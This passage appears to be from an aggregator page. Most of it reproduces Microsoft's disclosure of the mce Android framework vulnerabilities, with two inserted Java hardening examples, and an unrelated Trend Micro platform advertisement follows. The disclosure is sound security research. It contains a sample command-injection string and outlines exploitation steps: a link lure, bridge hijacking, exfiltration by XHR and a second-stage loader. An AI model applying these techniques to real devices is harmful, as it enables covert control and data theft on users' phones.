Additionally, the package com.mce.mceiotraceagent might be installed by several mobile phone repair shops. Mobile users are advised to look for that app name and remove it from their phone, if found.

Analyzing apps that use the mce framework

App manifest and permissions

When analyzing an Android application, the first thing that comes to mind is checking its manifest, maintained under the AndroidManifest.xml file. The manifest describes the application itself and its components, such as the following:

  • Permissions (for example, camera access, internet access, and others)
  • Activities and how they respond to Intents sent to them
  • Content providers
  • Receivers and the kind of content they expect to receive
  • Services

Checking the manifest of an app affiliated with mce Systems’ framework shed light on some of its features and capabilities but did not immediately indicate that any vulnerabilities or security issues were present. Therefore, further research into the app’s functionality was needed by understanding its permissions.

Analysis of the app’s permissions on the mobile device revealed authorizations that could lead to powerful access and capabilities for an attacker. Those permissions included control over the following:

  • Networking: access the internet, modify Wi-Fi state, network state, NFC, and Bluetooth
  • File access: read and write to the external storage
  • Peripherals: access the camera, record audio, get fingerprint information, and get the device’s physical location
  • Private information: read phone numbers, account information, and contacts
  • Management: install apps and modify device settings

With access to these valuable resources, the app could be abused by an attacker to implant a persistent backdoor on the device.

BROWSABLE activities

The “Activities” section of the app’s manifest detailed that the Intent-filter element included activities with a “BROWSABLE” category. While most Intents do not require a category, category strings detail the components that should handle the Intent. In particular, the BROWSABLE category allows the target Activity to be triggered from a web browser to display data referenced by a link, like an image. BROWSABLE activities appeal to attackers as the latter can exploit them via malicious web pages and other Intent-based attacks.

Figure 1: BROWSABLE Activity with the “mcedigital://” scheme

The Intent-filter element in the manifest dictates how the Activity can be triggered. In the app’s case, the Activity could be triggered by simply clicking a link with the “mcedigital://” scheme. This would start the com.mce.sdk.AppActivity Activity with an Intent with arbitrary data (besides the scheme).

Digging deeper: Reviewing the mce framework’s main functionality

We reviewed the effects of triggering the com.mce.sdk.AppActivity. Also known as appActivity, this Activity refers to the different functionalities provided by the app. AppActivity extends Activity and therefore has an onCreate method, which traditionally handles the creating Intent.

AppActivity

Here’s a brief description of AppActivity:

  1. AppActivity has a member called “webView” and type “JarvisWebView,” a specialized class that extends WebView.
  2. Upon creation, AppActivity has some optional display choices from the Intent (if they exist) and then loads a predefined web page to the WebView. That predefined page can get arbitrary query parameters from the Intent’s data; that is, everything after a “\?” will be added to the web page.

Thus, if a user clicks this:

mcedigital://ignored\?arbitrary_params

The App’s WebView loads the following web page:

file:///android_asset/applications/user/reflow-container-bundled/index.html?arbitrary_params

The app’s index.html web page (which is an asset built into the Android app) loads two JavaScript files:

  • config.js: a nonexistent file
  • bundle.js: contains much of the app’s logic

Since we wanted to understand the interplay between bundle.js (JarvisJSInterface) and the WebView (JarvisWebView), we analyzed both.

JarvisWebView and JarvisJSInterface

The main features of the WebView, JarvisWebView class, are the following:

A JavaScript Interface is a conspicuous target to look for security issues, as it uses a JavaScript Bridge to allow invoking specific methods inside an Android app. In the case of JarvisJSInterface, three methods are exported:

  • init(String): takes a string that will be used as a JavaScript callback method; in our case, it will always be window.AndroidCallback
  • windowClose(): runs a callback registered by the Android app
  • request(String): sends a service request from the JavaScript client to the server (Android app)

The request method is by far the most interesting, as it performs the following:

  1. Interprets the given string as a JSON object
  2. Extracts the following pieces from the JSON object:
    • Context: a random GUID generated by the client, used to link requests and responses
    • Service: the service we are about to call to
    • Command: an integer
    • Data: optional parameters sent to the service call
  3. Invokes the method serviceCall, which finds the registered service, gets the method based on the command number, and eventually invokes that method using Java reflection

Figure 2: Service::callServiceMethod

The serviceCall is a powerful method, as it allows the WebView to invoke “services” freely. But what are these services, exactly?

Services offered by the mce framework

After we examined the services offered by this framework per the app manifest, we then obtained a list of services that practically give the WebView complete control over the device. The most notable services include:

  • Audio: access and manipulate volume levels, as well as play a tone with a given duration and frequency
  • Camera: take a silent snapshot
  • Connectivity: control and obtain valuable information from NFC, Wi-Fi, and Bluetooth
  • Device: includes various device controlling mechanisms like battery drainage, performing a factory reset, and obtaining information on apps, addresses, sensor data, and much more
  • Discovery: set the device to discoverable
  • Location: obtain the location in various modes and set the location state
  • PackageManager: acquire package info and silently install a new app
  • Power: obtain charging state
  • Sensor: acquire sensor data such as barometer data, light data, proximity data, and whether fingerprinting is working
  • Storage: obtain content such as documents, media, images, and videos

These services inherit from a base class named “Service” and implement two methods:

  • setServiceName: for service identification purposes
  • setServiceMethodMap: for setting up the mapping between the command integer and the method name, argument names, and argument types

For example, here is the Camera service setting its methods:

  • Method 0 is “getCameraList” and expects no arguments.
  • Method 1 is “captureStillImageNoPreview” and expects one String argument.

Figure 3: The Camera service setting its methods

Vulnerability findings

Based on our analysis of the mce framework, we discovered several vulnerabilities. It should be noted that while mobile service providers can customize their respective apps built on the mce framework so that they are not identical, the vulnerabilities we discovered can all be exploited in the same manner—by injecting code into the web view. Nonetheless, as their apps and framework customizations use different configurations and versions, not all providers are necessarily vulnerable to all the discovered vulnerabilities.

Outdated command-injection vulnerability (CVE-2021-42599)

We found a command-injection vulnerability, tracked as CVE-2021-42599, in the Device service mentioned in the previous section. This service offers rich functionality, including the capability to stop activities of a given package. The client fully controls the argument “value,” which the service passes straight into the following shell command:

am force-stop "value"

Since the argument is not sanitized, an attacker could add backticks or quotation marks to run arbitrary code, like the following:

am force-stop "a"; command-to-run; echo "a"

Figure 4: Command injection proof-of-concept (POC) exploit code implemented in the Device service

According to mce Systems, they have since removed the functionality behind this vulnerability and it is no longer present in more advanced framework versions.
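The defensive counterpart of the command above, as an added illustration that is not mce Systems' or Microsoft's code: the package name is validated against the Android package-name grammar and handed to the process as a separate argument, so no shell ever parses it. The class name ForceStop and the use of ProcessBuilder are assumptions made for the example.

```java
// Added example (not from the page or the vendor): hardened version of a
// "stop this package" helper that is no longer vulnerable to shell injection.
import java.io.IOException;
import java.util.regex.Pattern;

public final class ForceStop {
    // Android package names are dot-separated Java identifiers with at least two
    // segments; this pattern admits nothing that a shell would treat specially.
    private static final Pattern PACKAGE_NAME =
            Pattern.compile("[A-Za-z][A-Za-z0-9_]*(\\.[A-Za-z][A-Za-z0-9_]*)+");

    // The vulnerable pattern built a single command string around the untrusted
    // value, so a quote and a ';' in the value terminated the argument and started
    // a new command. Here the value is validated first and then passed as its own
    // argv element; ProcessBuilder does not invoke /bin/sh, so metacharacters are
    // just characters (and they cannot pass the validation anyway).
    public static int forceStop(String packageName) throws IOException, InterruptedException {
        if (packageName == null || !PACKAGE_NAME.matcher(packageName).matches()) {
            throw new IllegalArgumentException("not a valid package name");
        }
        Process process = new ProcessBuilder("am", "force-stop", packageName).start();
        return process.waitFor();
    }

    // Returns whether a value would be accepted; useful for unit-testing the filter
    // without actually spawning a process.
    public static boolean isValidPackageName(String packageName) {
        return packageName != null && PACKAGE_NAME.matcher(packageName).matches();
    }
}
```

A system-signed app should prefer ActivityManager.forceStopPackage over spawning am at all, which also removes the process spawn from the attack surface.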

Exploitation by JavaScript injection with PiTM in certain apps

The services offered by the mce framework further indicated that the following vulnerability resided in the logic of the JavaScript client for apps that are configured to enable plaintext communications such as the app that we initially analyzed. Interestingly, the code for the client is a heavily-obfuscated dynamic JavaScript code that is implemented over several files, mainly bundle.js. Due to the blind trust between the JavaScript client and the JarvisJSInterface server, an attacker who could inject JavaScript contents into the WebView would inherit the permissions that the app already has.

We conceived two injection strategies most likely to be leveraged by attackers:

  1. Affect the JavaScript client behavior by supplying specific GET parameters from the BROWSABLE Intent.
  2. Trigger an app with the BROWSABLE Intent to become a person-in-the-middle (PiTM) and view the device’s entire traffic. Inject JavaScript code if the client ever tries to fetch external content and interpret it as a script or HTML.

Once we reverse-engineered the client’s obfuscated code, we discovered that it could not inject JavaScript from the GET parameters. The only capability permitted was to affect some of the client’s self-tests upon initialization, such as a battery-draining test or a Wi-Fi connectivity test. However, the WebView-fetched plaintext pages that we discovered could be injected into with a PiTM attack.

Our proof-of-concept (POC) exploit code was therefore:

  1. Perform a PiTM for the target device and lure the user into clicking a link with the “mcesystems://” schema.
  2. Inject JavaScript into one of the plaintext page responses that does the following:
    • Hijack the JavaScript interface by calling init with our callback method
    • Use the JavaScript interface request method to get servicing
    • Send the data to our server for information gathering using XHR (XMLHttpRequest)

Figure 5: Injecting a similar JavaScript code to the WebView could allow an attacker to call arbitrary services and methods

Local elevation of privilege with deserialization followed by injection (CVE-2021-42601)  

Some of the apps we analyzed did not pull plaintext pages. Thus, we looked for a local elevation of privilege vulnerability, allowing a malicious app to gain the system apps’ privileges, tracked as CVE-2021-42601.

In the apps mentioned above, we discovered that the main Activity attempted to handle a deep link (a link that launches an app instead of a browser on click) with Google Firebase. Interestingly, this deep-link handling tried to deserialize a structure called PendingDynamicLinkData (representing a link) from an Intent Extra byte array with the key com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. This structure was used later by the mce framework to generate various JSON Objects that might contain data from a categoryId query parameter in the original link, and eventually ended up in the member mFlowSDKInput to be injected into the JarvisWebView instance in an unsafe way:

Figure 6: Unsanitized JavaScript loading allowed arbitrary code injection to the WebView

Since the categoryId query parameter might contain apostrophes, one could inject arbitrary JavaScript code into the WebView. We decided to inject a code that would reach out to a server and load a second-stage code, which was the exact one we used for our PiTM scenario.

Figure 7: Local injection POC exploit

Software design against JavaScript injection vulnerabilities

We worked closely with the mce Systems engineering team and discovered that the reason for unsafe loadUrl invocations with JavaScript injections was that the framework used an asynchronous model of operation. When the JavaScript client performs a request, it expects to be notified later when there are results. Since Android JavaScript Bridge only allows primitive types to be sent (for example, Strings), the mce framework notified the JavaScript client by injecting JavaScript with potentially unsafe arguments (the results themselves).

We offered mce Systems a slightly different software design that prevents unsafe JavaScript injection. The description of the flow of information in our proposal is as follows:

  1. The JavaScript client invokes the request method on the Android JavaScript Bridge, supplying the request itself along with a request ID.
  2. The Java server performs the request and stores the result in a cache. The said cache then maps request IDs to results.
  3. The Java server notifies the client by carefully injecting the JavaScript loadUrl("javascript:window.onMceResult(<requestID>);") into the WebView. Note that the only non-constant string is the request ID, which can easily be sanitized. This method “wakes the client up.”
  4. The JavaScript client implementation of onMceResult invokes the Android JavaScript Bridge with the method String fetchResult(String requestId). Note that this method returns a string (which contains the result).

This way, the JavaScript client does not need to poll for asynchronous results while data is safely transferred between the client and the server.
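The four-step flow above, written out here as an added example that is neither mce Systems' nor Microsoft's code; it also shows the general rule behind the categoryId finding, namely that client-controlled strings never get concatenated into loadUrl. The class name SafeBridge, the bridge name mceBridge, the request ID alphabet, the "service"/"command" JSON field names and the single allowlisted handler are assumptions made for the example.

```java
// Added example (not the vendor's code): a WebView bridge that delivers
// asynchronous results without interpolating result data into injected JavaScript.
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.regex.Pattern;

public final class SafeBridge {
    // The request ID is the only client-supplied string ever placed inside injected
    // JavaScript, so it is limited to characters that cannot close the string
    // literal or the call (no quotes, backslashes, parentheses or newlines).
    private static final Pattern REQUEST_ID = Pattern.compile("[A-Za-z0-9-]{1,64}");

    private final WebView webView;
    private final Map<String, String> resultCache = new ConcurrentHashMap<>();
    private final ExecutorService worker = Executors.newSingleThreadExecutor();

    public SafeBridge(WebView webView) {
        this.webView = webView;
    }

    // Expose the bridge as window.mceBridge (assumed name). Attach it only to content
    // the app ships itself (file:///android_asset/...) or loads over HTTPS: a bridge
    // reachable from a plaintext page is what made the PiTM injection possible.
    public void attach() {
        webView.addJavascriptInterface(this, "mceBridge");
    }

    // Step 1: the client supplies the request together with a request ID it generated.
    @JavascriptInterface
    public void request(String requestId, String requestJson) {
        if (requestId == null || !REQUEST_ID.matcher(requestId).matches()) {
            return; // malformed ID: drop the request rather than ever echo it into JS
        }
        worker.execute(() -> {
            // Step 2: perform the work and cache the result under the request ID.
            resultCache.put(requestId, handle(requestJson));
            // Step 3: wake the client with a constant script plus the validated ID only.
            final String wakeUp = "javascript:window.onMceResult('" + requestId + "');";
            webView.post(() -> webView.loadUrl(wakeUp));
        });
    }

    // Step 4: the client's onMceResult handler pulls the result back through the
    // bridge. The result travels as a plain return value, never as executable code.
    @JavascriptInterface
    public String fetchResult(String requestId) {
        if (requestId == null || !REQUEST_ID.matcher(requestId).matches()) {
            return null;
        }
        return resultCache.remove(requestId);
    }

    // Dispatches a request of the shape {"service": ..., "command": N, ...} through an
    // explicit allowlist instead of reflection, so an arbitrary service name and
    // command number cannot reach an arbitrary method.
    private String handle(String requestJson) {
        try {
            JSONObject req = new JSONObject(requestJson);
            String service = req.getString("service");
            int command = req.getInt("command");
            JSONObject reply = new JSONObject();
            if ("device".equals(service) && command == 0) {
                reply.put("ok", true).put("release", Build.VERSION.RELEASE);
            } else {
                reply.put("ok", false).put("error", "unknown service or command");
            }
            return reply.toString();
        } catch (JSONException e) {
            return "{\"ok\":false,\"error\":\"malformed request\"}";
        }
    }
}
```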

Interestingly, Google AndroidX offers a very similar API: webMessageListener. While the said API works quite similarly to our suggestion, it only supports Android versions greater than Lollipop. Thus, the new mce framework now checks the Android version and uses this new Google API if supported or our offered solution for older devices.

The above is just one example of our collaboration to help secure our cross-platform ecosystem. According to mce Systems, all of our reported vulnerabilities were addressed.

Improving security for all through threat intelligence sharing and research-driven protections

Microsoft strives to continuously improve security by collaborating with customers, partners, and industry experts. Responding to the evolving threat landscape requires us to expand our capabilities into other devices and non-Windows platforms in addition to further coordinating research and threat intelligence sharing among the larger security community. This case highlighted the need for expert, cross-industry collaboration to effectively mitigate issues.

Moreover, collaborative research such as this informs our seamless protection capabilities across platforms. For example, intelligence from this analysis helped us ensure that Microsoft Defender Vulnerability Management can identify and remediate devices that have these vulnerabilities, providing security operations teams with comprehensive visibility into their organizational exposure and enabling them to reduce the attack surface. In addition, while we’re not aware of any active exploitation of these mobile vulnerabilities in the wild, Microsoft Defender for Endpoint’s mobile threat defense capabilities significantly improve security on mobile devices by detecting potential exploits, malware, and post-exploitation activity.

We will continue to work with the security community to share intelligence about threats and build better protection for all. Microsoft security researchers continually work to discover new vulnerabilities and threats, turning a variety of wide-reaching issues into tangible results and improved solutions that protect users and organizations across platforms every single day. Similarly inquisitive individuals are encouraged to check opportunities to join the Microsoft research team here: https://careers.microsoft.com/.  

Jonathan Bar Or, Sang Shin Jung, Michael Peck, Joe Mansour, and Apurva Kumar
Microsoft 365 Defender Research Team

Source :
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

Trend Micro’s One Vision, One Platform

The world moves fast sometimes. Just two years ago, organizations were talking vaguely about the need to transform digitally, and ransomware began to make headlines outside the IT media circle. Fast forward to 2022, and threat actors have held oil pipelines and critical food supply chains hostage, while many organizations have passed a digital tipping point that will leave them forever changed. Against this backdrop, CISOs are increasingly aware of running disjointed point products’ cost, operational, and risk implications.

That’s why Trend Micro is transforming from a product- to a platform-centric company. From the endpoint to the cloud, we’re focused on helping our customers prepare for, withstand, and rapidly recover from threats—freeing them to go further and do more. Analysts seem to agree.

Unprecedented change

The digital transformation that organizations underwent during the pandemic was, in some cases, unprecedented. It helped them adapt to a new reality of remote and now hybrid working, supply chain disruption, and rising customer expectations. The challenge is that these investments in cloud infrastructure and services are broadening the corporate attack surface. In many cases, in-house teams are drowning in new attack techniques and cloud provider features. This can lead to misconfigurations which open the door to hackers.

Yet even without human error, there’s plenty for the bad guys to target in modern IT environments—from unpatched vulnerabilities to accounts protected with easy-to-guess or previously breached passwords. That means threat prevention isn’t always possible. Instead, organizations are increasingly looking to augment these capabilities with detection and response tooling like XDR to ensure incidents don’t turn into large-scale breaches. It’s important that these tools are able to prioritize alerts. Trend Micro found that as many as 70% of security operations (SecOps) teams are emotionally overwhelmed with the sheer volume of alerts they’re forced to deal with.

SecOps staff and their colleagues across the IT function are stretched to the limit by these trends, which are compounded by industry skills shortages. The last thing they need is to have to swivel-chair between multiple products to find the right information.

What Gartner says

Analyst firm Gartner is observing the same broad industry trends. In a recent report, it claimed that:

  • Vendors are increasingly divided into “platform” and “portfolio” providers—the latter providing products with little underlying integration
  • By 2025, 70% of organizations will reduce to a maximum of three the number of vendors they use to secure cloud-native applications
  • By 2027, half of mid-market security buyers will use XDR to help consolidate security technologies such as endpoint, cloud, and identity
  • Vendors are increasingly integrating diverse security capabilities into a single platform. Those which minimize the number of consoles and configuration planes, and reuse components and information, will generate the biggest benefits

The power of one

This is music to our ears. It is why Trend Micro is introducing a unified cybersecurity platform, delivering protection across the endpoint, network, email, IoT, and cloud, all tied together with threat detection and response from our Vision One platform. These capabilities will help customers optimize protection, detection, and response, leveraging automation across the key layers of their IT environment in a way that leaves no coverage gaps for the bad guys to hide in.

With fewer vendors to manage, a high degree of automation, and better alert prioritization, stretched security teams face less overhead and fewer hands-on decisions. Trend Micro’s unified cybersecurity platform vision also includes Trend Micro Service One for 24/7/365 managed detection, response, and support—to augment in-house skills and let teams focus on higher-value tasks.

According to Gartner, the growth in market demand for platform-based offerings has led some vendors to bundle products as a portfolio despite no underlying synergy. This can be a “worst of all worlds,” as products are neither best-of-breed nor do they reduce complexity and overheads, it claims.

We agree. That’s why Trend Micro offers a fundamentally more coherent platform approach. We help organizations continuously discover an ever-changing attack surface, assess risks and then take streamlined steps to mitigate that risk—applying the right security at the right time. That’s one vision, one platform, and total protection.

To find out more about Trend Micro One, please visit: https://www.trendmicro.com/platform-one

Source:
https://www.trendmicro.com/en_us/research/22/e/platform-centric-enterprise-cybersecurity-protection.html